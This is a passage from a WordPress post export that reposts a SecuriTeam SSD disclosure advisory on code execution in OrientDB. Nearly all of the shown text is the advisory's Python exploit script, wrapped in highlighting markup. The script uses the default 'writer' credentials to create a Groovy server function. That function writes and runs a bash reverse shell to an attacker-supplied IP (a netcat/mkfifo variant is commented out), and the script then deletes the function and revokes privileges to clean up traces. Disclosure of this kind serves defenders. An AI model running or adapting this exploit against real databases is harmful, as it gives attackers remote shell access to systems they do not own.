class=\"crayon-s\">&#8216;{&#8220;@class&#8221;:&#8221;ofunction&#8221;,&#8221;@version&#8221;:0,&#8221;@rid&#8221;:&#8221;#-1:-1&#8243;,&#8221;idempotent&#8221;:null,&#8221;name&#8221;:&#8221;&#8216;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">func_name<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8216;&#8221;,&#8221;language&#8221;:&#8221;groovy&#8221;,&#8221;code&#8221;:&#8221;def command = &#8216;bash -i &gt;&amp; \/dev\/tcp\/&#8217;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">reverse_ip<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8216;\/8081 0&gt;&amp;1&#8242;;File file = new File(\\&#8221;hello.sh\\&#8221;);file.delete();file &lt;&lt; (\\&#8221;#!\/bin\/bash\\\\n\\&#8221;);file &lt;&lt; (command);def proc = \\&#8221;bash hello.sh\\&#8221;.execute();&#8221;,&#8221;parameters&#8221;:null}&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-102\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#query = &#8216;{&#8220;@class&#8221;:&#8221;ofunction&#8221;,&#8221;@version&#8221;:0,&#8221;@rid&#8221;:&#8221;#-1:-1&#8243;,&#8221;idempotent&#8221;:null,&#8221;name&#8221;:&#8221;&#8216;+func_name+'&#8221;,&#8221;language&#8221;:&#8221;groovy&#8221;,&#8221;code&#8221;:&#8221;def command = &#8216;rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2&gt;&amp;1|nc 0.0.0.0 8081 &gt;\/tmp\/f&#8217; u000a File file = new File(&#8220;hello.sh&#8221;)u000a&nbsp;&nbsp;&nbsp;&nbsp; file.delete()&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; u000a&nbsp;&nbsp;&nbsp;&nbsp; file &lt;&lt; (&#8220;#!\/bin\/bash&#8221;)u000a&nbsp;&nbsp;&nbsp;&nbsp; file &lt;&lt; (command)n&nbsp;&nbsp;&nbsp;&nbsp;def proc = &#8220;bash hello.sh&#8221;.execute() &#8220;,&#8221;parameters&#8221;:null}&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-103\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#query = {&#8220;@class&#8221;:&#8221;ofunction&#8221;,&#8221;@version&#8221;:0,&#8221;@rid&#8221;:&#8221;#-1:-1&#8243;,&#8221;idempotent&#8221;:None,&#8221;name&#8221;:&#8221;lllasd&#8221;,&#8221;language&#8221;:&#8221;groovy&#8221;,&#8221;code&#8221;:&#8221;def command = &#8216;bash -i &gt;&amp; \/dev\/tcp\/0.0.0.0\/8081 0&gt;&amp;1&#8217;;File file = new File(&#8220;hello.sh&#8221;);file.delete();file &lt;&lt; (&#8220;#!\/bin\/bash\\n&#8221;);file &lt;&lt; (command);def proc = &#8220;bash hello.sh&#8221;.execute();&#8221;,&#8221;parameters&#8221;:None}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-104\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">req<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/%s:%s\/document\/%s\/-1:-1&#8221;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">databases<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">query<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;writer&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8216;writer&#8217;<\/span><span 
class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-105\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-106\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">req<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">status_code<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">201<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-107\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-108\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#print req.status_code<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-109\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#print req.json()<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-110\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-111\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">func_id<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">req<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-k\">json<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;@rid&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">strip<\/span><span class=\"crayon-sy\">(<\/span><span 
class=\"crayon-s\">&#8220;#&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-112\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#print func_id<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-113\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-114\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Exploitation successful, get ready for your shell.Executing %s&#8221;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">func_name<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-115\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-116\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">req<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/%s:%s\/function\/%s\/%s&#8221;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">databases<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">func_name<\/span><span class=\"crayon-sy\">)<\/span><span 
class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;writer&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8216;writer&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-117\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#print req.status_code<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-118\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#print req.text<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-119\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-120\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">req<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">status_code<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-121\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Open netcat at port 8081..&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-122\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div 
class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-123\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Exploitation failed at last step, try running the script again.&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-124\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">req<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">status_code<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-125\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">req<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-126\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-127\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#print &#8220;[+] Deleting traces..&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-128\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-129\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">req<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">delete<\/span><span class=\"crayon-sy\">(<\/span><span 
class=\"crayon-s\">&#8220;http:\/\/%s:%s\/document\/%s\/%s&#8221;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">databases<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">func_id<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;writer&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8216;writer&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-130\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">priv1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">run_queries<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;REVOKE&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;database.class.ouser&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;Cleaning Up..database.class.ouser&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-131\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">priv2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">run_queries<\/span><span class=\"crayon-sy\">(<\/span><span 
class=\"crayon-s\">&#8220;REVOKE&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;database.function&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;Cleaning Up..database.function&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-132\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">priv3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">run_queries<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;REVOKE&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;database.systemclusters&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;Cleaning Up..database.systemclusters&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-133\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-134\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#print req.status_code<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-135\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#print req.text<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-136\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-137\"><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-5967f204b10dc863783322-138\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-139\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-140\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#port = sys.argv[1] if sys.argv[1] else 2480<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-141\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-142\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2480<\/span><\/div>\n<div class=\"crayon-line\" 
id=\"crayon-5967f204b10dc863783322-143\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#print port<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-144\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">except<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-145\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2480<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-146\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">priv_escalation<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-147\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">exploit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-148\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-149\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span 
class=\"crayon-k\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Target not vulnerable&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-150\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-151\"><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3318\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Thu, 13 Jul 2017 06:49:26 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory reports a vulnerability in OrientDB which allows users of the product to cause it to execute code. OrientDB is a Distributed Graph Database engine with the flexibility of a Document Database all in one product. The first and best scalable, high-performance, operational NoSQL database. 
Credit An independent security researcher, Francis &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3318\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 OrientDB Code Execution<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11682,10757],"class_list":["post-8338","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-remote-code-execution","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/8338","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=8338"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/8338\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=8338"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=8338"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=8338"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}